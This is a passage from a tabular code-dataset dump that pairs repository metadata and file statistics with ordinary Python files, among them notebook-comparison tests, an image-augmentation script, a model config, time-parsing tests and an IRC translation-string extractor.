] | null | null | null |
# Using continue in a for loop; continue means "skip" this iteration!!!
for i in range(1, 11):
    if i == 6:
        continue
    print(i)
    print(i)
    print(i)
    print(i)
    print(i)
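# [Added note -- not part of the original record.] Expected output: each of
# the numbers 1-5 and 7-10 printed five times; 6 never appears because
# `continue` skips the five print calls for that iteration.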
| 17.9 | 45 | 0.49162 | 25 | 179 | 3.52 | 0.52 | 0.340909 | 0.5 | 0.545455 | 0.340909 | 0.340909 | 0.340909 | 0.340909 | 0 | 0 | 0 | 0.034188 | 0.346369 | 179 | 9 | 46 | 19.888889 | 0.717949 | 0.234637 | 0 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.625 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
d4d56609e653c9ccb3c77b86d7440eff8168b7af
| 89 |
py
|
Python
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 2 |
2020-08-01T02:51:48.000Z
|
2021-11-22T11:58:40.000Z
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 4 |
2019-10-30T14:14:46.000Z
|
2022-03-11T23:57:52.000Z
|
root/converter/__init__.py
|
thasmarinho/root-image-editor
|
0c3e955a1f81be02fef9a488b2b45a44cf16930a
|
[
"MIT"
] | 1 |
2021-02-21T12:18:05.000Z
|
2021-02-21T12:18:05.000Z
|
from .color_converter import ColorConverter
from .scale_converter import ScaleConverter
| 22.25 | 43 | 0.876404 | 10 | 89 | 7.6 | 0.7 | 0.394737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 89 | 3 | 44 | 29.666667 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
d4f37664ce2a24dbc73824c236ef48b007de021a
| 6,681 |
py
|
Python
|
tests/test_compare.py
|
fool65c/jupytext
|
4b55d2e6ccc995c04679de0863234c60c3741a69
|
[
"MIT"
] | 1 |
2019-05-06T07:39:15.000Z
|
2019-05-06T07:39:15.000Z
|
tests/test_compare.py
|
royalosyin/jupytext
|
72aa6c4968da714323fbd7a7c548ee4b1274c946
|
[
"MIT"
] | null | null | null |
tests/test_compare.py
|
royalosyin/jupytext
|
72aa6c4968da714323fbd7a7c548ee4b1274c946
|
[
"MIT"
] | null | null | null |
import pytest
from nbformat.v4.nbbase import new_notebook, new_markdown_cell, new_code_cell, new_raw_cell
from jupytext.compare import compare_notebooks, NotebookDifference, test_round_trip_conversion as round_trip_conversion


def test_raise_on_different_metadata():
    ref = new_notebook(metadata={'kernelspec': {'language': 'python', 'name': 'python', 'display_name': 'Python'}},
                       cells=[new_markdown_cell('Cell one')])
    test = new_notebook(metadata={'kernelspec': {'language': 'R', 'name': 'R', 'display_name': 'R'}},
                        cells=[new_markdown_cell('Cell one')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md')


@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_type(raise_on_first_difference):
    ref = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Cell two')])
    test = new_notebook(cells=[new_markdown_cell('Cell one'), new_raw_cell('Cell two')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md', raise_on_first_difference=raise_on_first_difference)


@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_content(raise_on_first_difference):
    ref = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Cell two')])
    test = new_notebook(cells=[new_markdown_cell('Cell one'), new_code_cell('Modified cell two')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md', raise_on_first_difference=raise_on_first_difference)


def test_raise_on_incomplete_markdown_cell():
    ref = new_notebook(cells=[new_markdown_cell('Cell one\n\n\nsecond line')])
    test = new_notebook(cells=[new_markdown_cell('Cell one')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md')


def test_does_raise_on_split_markdown_cell():
    ref = new_notebook(cells=[new_markdown_cell('Cell one\n\n\nsecond line')])
    test = new_notebook(cells=[new_markdown_cell('Cell one'),
                               new_markdown_cell('second line')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md')


def test_raise_on_different_cell_metadata():
    ref = new_notebook(cells=[new_code_cell('1+1')])
    test = new_notebook(cells=[new_code_cell('1+1', metadata={'metakey': 'value'})])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'py:light')


@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_cell_count(raise_on_first_difference):
    ref = new_notebook(cells=[new_code_cell('1')])
    test = new_notebook(cells=[new_code_cell('1'),
                               new_code_cell('2')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'py:light', raise_on_first_difference=raise_on_first_difference)
    with pytest.raises(NotebookDifference):
        compare_notebooks(test, ref, 'py:light', raise_on_first_difference=raise_on_first_difference)


def test_does_not_raise_on_blank_line_removed():
    ref = new_notebook(cells=[new_code_cell('1+1\n ')])
    test = new_notebook(cells=[new_code_cell('1+1')])
    compare_notebooks(ref, test, 'py:light')


def test_strict_raise_on_blank_line_removed():
    ref = new_notebook(cells=[new_code_cell('1+1\n')])
    test = new_notebook(cells=[new_code_cell('1+1')])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'py:light', allow_expected_differences=False)


def test_dont_raise_on_different_outputs():
    ref = new_notebook(cells=[new_code_cell('1+1')])
    test = new_notebook(cells=[new_code_cell('1+1', outputs=[
        {
            "data": {
                "text/plain": [
                    "2"
                ]
            },
            "execution_count": 1,
            "metadata": {},
            "output_type": "execute_result"
        }
    ])])
    compare_notebooks(ref, test, 'md')


@pytest.mark.parametrize('raise_on_first_difference', [True, False])
def test_raise_on_different_outputs(raise_on_first_difference):
    ref = new_notebook(cells=[new_code_cell('1+1')])
    test = new_notebook(cells=[new_code_cell('1+1', outputs=[
        {
            "data": {
                "text/plain": [
                    "2"
                ]
            },
            "execution_count": 1,
            "metadata": {},
            "output_type": "execute_result"
        }
    ])])
    with pytest.raises(NotebookDifference):
        compare_notebooks(ref, test, 'md', compare_outputs=True, raise_on_first_difference=raise_on_first_difference)


def test_test_round_trip_conversion():
    notebook = new_notebook(cells=[new_code_cell('1+1', outputs=[
        {
            "data": {
                "text/plain": [
                    "2"
                ]
            },
            "execution_count": 1,
            "metadata": {},
            "output_type": "execute_result"
        }
    ])], metadata={'main_language': 'python'})
    round_trip_conversion(notebook, {'extension': '.py'}, update=True)


def test_mutiple_cells_differ():
    nb1 = new_notebook(cells=[new_code_cell(''),
                              new_code_cell('2')])
    nb2 = new_notebook(cells=[new_code_cell('1+1'),
                              new_code_cell('2\n2')])
    with pytest.raises(NotebookDifference) as exception_info:
        compare_notebooks(nb1, nb2, raise_on_first_difference=False)
    assert 'Cells 1,2 differ' in exception_info.value.args[0]


def test_cell_metadata_differ():
    nb1 = new_notebook(cells=[new_code_cell('1'),
                              new_code_cell('2', metadata={'additional': 'metadata1'})])
    nb2 = new_notebook(cells=[new_code_cell('1'),
                              new_code_cell('2', metadata={'additional': 'metadata2'})])
    with pytest.raises(NotebookDifference) as exception_info:
        compare_notebooks(nb1, nb2, raise_on_first_difference=False)
    assert "Cell metadata 'additional' differ" in exception_info.value.args[0]


def test_notebook_metadata_differ():
    nb1 = new_notebook(cells=[new_code_cell('1'),
                              new_code_cell('2')])
    nb2 = new_notebook(cells=[new_code_cell('1'),
                              new_code_cell('2')],
                       metadata={'kernelspec': {'language': 'python', 'name': 'python', 'display_name': 'Python'}})
    with pytest.raises(NotebookDifference) as exception_info:
        compare_notebooks(nb1, nb2, raise_on_first_difference=False)
    assert "Notebook metadata differ" in exception_info.value.args[0]
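# [Added usage sketch -- not part of the original record.] The pattern these
# tests exercise: build two in-memory notebooks and diff them in a given
# jupytext format, catching NotebookDifference on mismatch.
#
#   nb_a = new_notebook(cells=[new_code_cell('1+1')])
#   nb_b = new_notebook(cells=[new_code_cell('1+2')])
#   try:
#       compare_notebooks(nb_a, nb_b, 'py:light')
#   except NotebookDifference as err:
#       print('notebooks differ:', err)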
| 41.75625 | 119 | 0.658135 | 822 | 6,681 | 4.989051 | 0.115572 | 0.054621 | 0.080468 | 0.125091 | 0.841258 | 0.821019 | 0.790051 | 0.782492 | 0.77347 | 0.712753 | 0 | 0.012128 | 0.210148 | 6,681 | 159 | 120 | 42.018868 | 0.765018 | 0 | 0 | 0.543307 | 0 | 0 | 0.129322 | 0.014968 | 0 | 0 | 0 | 0 | 0.023622 | 1 | 0.11811 | false | 0 | 0.023622 | 0 | 0.141732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
be1f1730e3c83173cbfa65bc65d2316eb598bfbe
| 4,127 |
py
|
Python
|
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
delete.py
|
lvwuyunlifan/crop
|
7392d007a8271ff384c5c66ed5717afbc4172b4d
|
[
"Apache-2.0"
] | null | null | null |
import os
from PIL import Image, ImageFilter
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# import seaborn as sns
import pandas as pd
import numpy as np
import random

train_path = './AgriculturalDisease_trainingset/'
valid_path = './AgriculturalDisease_validationset/'


def genImage(gpath, datatype):
    if datatype == 'train':
        gen_number = 0  # count of generated images
        if not os.path.exists(gpath + 'delete'):
            os.makedirs(gpath + 'delete')
        label = pd.read_csv(gpath + 'label.csv')
        label_gen_dict = {'img_path': [], 'label': []}  # labels for the generated images
        for i in range(61):
            li = label[label['label'] == i]
            imagenum = li['label'].count()
            print('Class %d: %d images in total' % (i, imagenum))
            imagelist = np.array(li['img_path']).tolist()
            img_path_gen, label_gen = [], []
            # for imagefile in imagelist:
            for aa in range(len(imagelist)):
                if aa <= 40:
                    print(aa)
                    path, imagename = os.path.split(imagelist[aa])
                    im = Image.open(imagelist[aa])
                    im = im.convert('RGB')
                    im_detail = im.transpose(Image.ROTATE_180)
                    # im_detail = im.filter(ImageFilter.DETAIL)  # detail enhancement
                    img_path_gen.append(gpath + 'delete/' + 'idetail_' + imagename)
                    label_gen.extend([int(i)])
                    im_detail.save(gpath + 'delete/' + 'idetail_' + imagename)
                    gen_number += 1
            label_dict = {'img_path': img_path_gen, 'label': label_gen}
            label_gen_dict['img_path'].extend(img_path_gen)
            label_gen_dict['label'].extend(label_gen)
            label_gen_pd = pd.DataFrame(label_dict)
            # label = label.append(label_gen_pd)  # append the generated labels to the original ones
            # label['label'] = label[['label']].astype('int64')  # convert to int64
            # print(label)
        label_gen_p = pd.DataFrame(label_gen_dict)
        label_gen_p.to_csv(gpath + 'label_delete.csv', index=False)
        # label_gen_p = pd.DataFrame(label_gen_dict)
        # label_gen_p.to_csv(gpath + 'label_gen.csv', index=False)
        print('Training set: generated %d images in total' % gen_number)

    if datatype == 'valid':
        gen_number = 0
        if not os.path.exists(gpath + 'delete'):
            os.makedirs(gpath + 'delete')
        label = pd.read_csv(gpath + 'label.csv')
        label_gen_dict = {'img_path': [], 'label': []}
        for i in range(61):
            li = label[label['label'] == i]
            imagenum = li['label'].count()
            print('Class %d: %d images in total' % (i, imagenum))
            imagelist = np.array(li['img_path']).tolist()
            img_path_gen, label_gen = [], []
            # for imagefile in imagelist:
            for aa in range(len(imagelist)):
                if aa <= 20:
                    print(aa)
                    path, imagename = os.path.split(imagelist[aa])
                    im = Image.open(imagelist[aa])
                    im = im.convert('RGB')
                    im_detail = im.transpose(Image.ROTATE_180)
                    # im_detail = im.filter(ImageFilter.DETAIL)  # detail enhancement
                    img_path_gen.append(gpath + 'delete/' + 'idetail_' + imagename)
                    label_gen.extend([int(i)])
                    im_detail.save(gpath + 'delete/' + 'idetail_' + imagename)
                    gen_number += 1
            label_dict = {'img_path': img_path_gen, 'label': label_gen}
            label_gen_dict['img_path'].extend(img_path_gen)
            label_gen_dict['label'].extend(label_gen)
            label_gen_pd = pd.DataFrame(label_dict)
            # label = label.append(label_gen_pd)  # append the generated labels to the original ones
            # label['label'] = label[['label']].astype('int64')  # convert to int64
            # print(label)
        label_gen_p = pd.DataFrame(label_gen_dict)
        label_gen_p.to_csv(gpath + 'label_delete.csv', index=False)
        print('Validation set: generated %d images in total' % gen_number)


if __name__ == '__main__':
    genImage(train_path, 'train')
    genImage(valid_path, 'valid')
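# [Added note -- not part of the original record.] Both branches perform the
# same augmentation: rotate each selected image 180 degrees
# (Image.ROTATE_180), save it under <set>/delete/ with an 'idetail_' prefix,
# and write the new paths to label_delete.csv; only the per-class cap differs
# (the first 41 images for train, the first 21 for valid).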
| 35.886957 | 83 | 0.557063 | 483 | 4,127 | 4.52381 | 0.196687 | 0.102517 | 0.049428 | 0.04119 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0.794508 | 0 | 0.009184 | 0.31403 | 4,127 | 114 | 84 | 36.201754 | 0.762628 | 0.135692 | 0 | 0.739726 | 0 | 0 | 0.113963 | 0.019746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013699 | false | 0 | 0.09589 | 0 | 0.109589 | 0.082192 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
07ab77d7eb12a86186be6ca7c7efa3f2eb65e7be
| 342 |
py
|
Python
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 33 |
2021-12-15T07:11:47.000Z
|
2022-03-29T08:58:32.000Z
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 3 |
2021-12-15T11:39:54.000Z
|
2022-03-29T07:24:23.000Z
|
configs/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_16_36WoodBlock.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | null | null | null |
_base_ = "./FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_Pbr_01_02MasterChefCan.py"
OUTPUT_DIR = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_NoiseRandom_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/16_36WoodBlock"
DATASETS = dict(TRAIN=("ycbv_036_wood_block_train_pbr",))
| 85.5 | 154 | 0.903509 | 45 | 342 | 6.155556 | 0.688889 | 0.079422 | 0.187726 | 0.267148 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0.570397 | 0 | 0.093093 | 0.026316 | 342 | 3 | 155 | 114 | 0.738739 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
07c22498468a49059683c71a90ec92358cf9e563
| 916 |
py
|
Python
|
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | 9 |
2020-01-24T17:15:03.000Z
|
2020-06-02T14:16:40.000Z
|
tests/test_timeparser.py
|
vgoehler/python-i3-battery-block
|
e47ce80b315d812d731df84f2a1c8e1155b2469a
|
[
"BSD-2-Clause"
] | null | null | null |
from datetime import time

import pytest

from i3_battery_block_vgg.timeparser import __parse_time_manually
from i3_battery_block_vgg.timeparser import parse_time


@pytest.mark.parametrize(
    "time_input, expected",
    [
        ("12:13", time(hour=12, minute=13)),
        ("12:13:14", time(hour=12, minute=13, second=14)),
        ('00:54:00', time(hour=0, minute=54, second=0))
    ]
)
def test_manually_time_parsing(time_input: str, expected: time):
    assert __parse_time_manually(time_input) == expected, "manual time parsing has gone wrong"


@pytest.mark.parametrize(
    "time_input, expected",
    [
        ("12:13", time(hour=12, minute=13)),
        ("12:13:14", time(hour=12, minute=13, second=14)),
        ('00:54:00', time(hour=0, minute=54, second=0))
    ]
)
def test_time_parsing(time_input: str, expected: time):
    assert parse_time(time_input) == expected, "time parsing has gone wrong"
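# [Added note -- not part of the original record.] Both tests share the same
# parametrized cases, so the public parse_time and the internal
# __parse_time_manually are expected to agree on 'HH:MM' and 'HH:MM:SS' input.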
| 29.548387 | 94 | 0.677948 | 134 | 916 | 4.432836 | 0.253731 | 0.090909 | 0.114478 | 0.107744 | 0.835017 | 0.757576 | 0.757576 | 0.757576 | 0.757576 | 0.602694 | 0 | 0.082337 | 0.177948 | 916 | 30 | 95 | 30.533333 | 0.706507 | 0 | 0 | 0.416667 | 0 | 0 | 0.156114 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
ed7af640d287226ceb10c1b2fceda155d15712f4
| 7,426 |
py
|
Python
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 1,122 |
2017-06-15T05:44:52.000Z
|
2021-05-26T16:27:43.000Z
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 1,031 |
2017-06-18T13:57:51.000Z
|
2021-05-26T19:51:37.000Z
|
updatetranslations.py
|
erincerys/ergo
|
0aeedcdcccb5348d8eedb5faa6a0536d93ca3ae3
|
[
"MIT"
] | 113 |
2017-06-21T18:32:53.000Z
|
2021-05-26T13:12:46.000Z
|
#!/usr/bin/env python3
# updatetranslations.py
#
# tl;dr this script updates our translation file with the newest, coolest strings we've added!
# it manually searches the source code, extracts strings and then updates the language files.
# Written in 2018 by Daniel Oaks <daniel@danieloaks.net>
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
"""updatetranslations.py

Usage:
    updatetranslations.py run <irc-dir> <languages-dir>
    updatetranslations.py --version
    updatetranslations.py (-h | --help)

Options:
    <irc-dir>        Oragono's irc subdirectory where the Go code is kept.
    <languages-dir>  Languages directory."""
import os
import re
import json

from docopt import docopt
import yaml

ignored_strings = [
    'none', 'saset'
]

if __name__ == '__main__':
    arguments = docopt(__doc__, version="0.1.0")

    if arguments['run']:
        # general IRC strings
        irc_strings = []
        for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
            for fname in files:
                filepath = subdir + os.sep + fname
                if filepath.endswith('.go'):
                    content = open(filepath, 'r', encoding='UTF-8').read()
                    matches = re.findall(r'\.t\("((?:[^"]|\\")+)"\)', content)
                    for match in matches:
                        if match not in irc_strings:
                            irc_strings.append(match)
                    matches = re.findall(r'\.t\(\`([^\`]+)\`\)', content)
                    for match in matches:
                        if match not in irc_strings:
                            irc_strings.append(match)

        for s in ignored_strings:
            try:
                irc_strings.remove(s)
            except ValueError:
                # ignore any that don't exist
                ...

        print("irc strings:", len(irc_strings))
        with open(os.path.join(arguments['<languages-dir>'], 'example', 'irc.lang.json'), 'w') as f:
            f.write(json.dumps({k:k for k in irc_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
            f.write('\n')

        for string in irc_strings:
            if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
                print(' confirm:', string)

        # help entries
        help_strings = []
        for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
            for fname in files:
                filepath = subdir + os.sep + fname
                if fname == 'help.go':
                    content = open(filepath, 'r', encoding='UTF-8').read()
                    matches = re.findall(r'\`([^\`]+)\`', content)
                    for match in matches:
                        if '\n' in match and match not in help_strings:
                            help_strings.append(match)

        for s in ignored_strings:
            try:
                help_strings.remove(s)
            except ValueError:
                # ignore any that don't exist
                ...

        print("help strings:", len(help_strings))
        with open(os.path.join(arguments['<languages-dir>'], 'example', 'help.lang.json'), 'w') as f:
            f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
            f.write('\n')

        for string in help_strings:
            if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
                print(' confirm:', string.split('\n')[0])

        # nickserv help entries
        help_strings = []
        for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
            for fname in files:
                filepath = subdir + os.sep + fname
                if fname == 'nickserv.go':
                    content = open(filepath, 'r', encoding='UTF-8').read()
                    matches = re.findall(r'\`([^\`]+)\`', content)
                    for match in matches:
                        if match not in help_strings:
                            help_strings.append(match)

        for s in ignored_strings:
            try:
                help_strings.remove(s)
            except ValueError:
                # ignore any that don't exist
                ...

        print("nickserv help strings:", len(help_strings))
        with open(os.path.join(arguments['<languages-dir>'], 'example', 'nickserv.lang.json'), 'w') as f:
            f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
            f.write('\n')

        for string in help_strings:
            if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
                print(' confirm:', string)

        # chanserv help entries
        help_strings = []
        for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
            for fname in files:
                filepath = subdir + os.sep + fname
                if fname == 'chanserv.go':
                    content = open(filepath, 'r', encoding='UTF-8').read()
                    matches = re.findall(r'\`([^\`]+)\`', content)
                    for match in matches:
                        if match not in help_strings:
                            help_strings.append(match)

        for s in ignored_strings:
            try:
                help_strings.remove(s)
            except ValueError:
                # ignore any that don't exist
                ...

        print("chanserv help strings:", len(help_strings))
        with open(os.path.join(arguments['<languages-dir>'], 'example', 'chanserv.lang.json'), 'w') as f:
            f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
            f.write('\n')

        for string in help_strings:
            if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
                print(' confirm:', string)

        # hostserv help entries
        help_strings = []
        for subdir, dirs, files in os.walk(arguments['<irc-dir>']):
            for fname in files:
                filepath = subdir + os.sep + fname
                if fname == 'hostserv.go':
                    content = open(filepath, 'r', encoding='UTF-8').read()
                    matches = re.findall(r'\`([^\`]+)\`', content)
                    for match in matches:
                        if match not in help_strings:
                            help_strings.append(match)

        for s in ignored_strings:
            try:
                help_strings.remove(s)
            except ValueError:
                # ignore any that don't exist
                ...

        print("hostserv help strings:", len(help_strings))
        with open(os.path.join(arguments['<languages-dir>'], 'example', 'hostserv.lang.json'), 'w') as f:
            f.write(json.dumps({k:k for k in help_strings}, sort_keys=True, indent=2, separators=(',', ': ')))
            f.write('\n')

        for string in help_strings:
            if 1 < string.count('%s') + string.count('%d') + string.count('%f'):
                print(' confirm:', string)
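# [Added usage note -- not part of the original record.] Per the docopt
# string above, the script is invoked as, e.g.:
#
#   python3 updatetranslations.py run ./irc ./languages
#
# which regenerates <languages-dir>/example/{irc,help,nickserv,chanserv,
# hostserv}.lang.json from strings found in the Go sources under <irc-dir>.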
| 37.887755 | 110 | 0.524239 | 862 | 7,426 | 4.446636 | 0.194896 | 0.091834 | 0.040699 | 0.026611 | 0.72502 | 0.72502 | 0.72502 | 0.72502 | 0.72502 | 0.719019 | 0 | 0.005509 | 0.340022 | 7,426 | 195 | 111 | 38.082051 | 0.776576 | 0.15917 | 0 | 0.728 | 0 | 0 | 0.102172 | 0.003862 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
ed7fc7d6fb252e1b75bf1b904b18ffd861a8c42f
| 1,162 |
py
|
Python
|
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1 |
2017-03-08T22:58:35.000Z
|
2017-03-08T22:58:35.000Z
|
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | null | null | null |
testproject/testapp/tests/__init__.py
|
movermeyer/django-firestone
|
e045089f6ff4a6686633f9c5909c314a010bd4a0
|
[
"WTFPL"
] | 1 |
2018-03-05T17:40:55.000Z
|
2018-03-05T17:40:55.000Z
|
from test_proxy import *
from test_serializers import *
from test_deserializers import *
from test_exceptions import *
from test_authentication import *
from test_whole_flow import *
from test_handlers_metaclass_magic import *
from test_handlers_serialize_to_python import *
from test_handlers_is_method_allowed import *
from test_handlers_data_control import *
from test_handlers_package import *
from test_handlers_finalize_pending import *
from test_handlers_cleanse_body import *
from test_handlers_validate import *
from test_handlers_clean_models import *
from test_handlers_get import *
from test_handlers_is_catastrophic import *
from test_handlers_post import *
from test_handlers_put import *
from test_handlers_delete import *
from test_handlers_patch_response import *
from test_handlers_authentication_hook import *
from test_handlers_filter_data import *
from test_handlers_order import *
from test_handlers_order_data import *
from test_handlers_paginate import *
from test_handlers_paginate_data import *
from test_handlers_inject_data_hook import *
from test_handlers_handle_exception import *
from test_handlers_deserialize_body import *
| 31.405405 | 47 | 0.865749 | 164 | 1,162 | 5.682927 | 0.268293 | 0.257511 | 0.435622 | 0.566524 | 0.266094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108434 | 1,162 | 36 | 48 | 32.277778 | 0.899614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
ed8c508acbabfde1092353a8acaec8aac8951535
| 47 |
py
|
Python
|
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
e7f82077b1fd4c2ec5afa463973ecde599209549
|
[
"MIT"
] | 1 |
2019-02-19T19:41:36.000Z
|
2019-02-19T19:41:36.000Z
|
library/libvirt_filter.py
|
bkmeneguello/ansible-role-libvirt
|
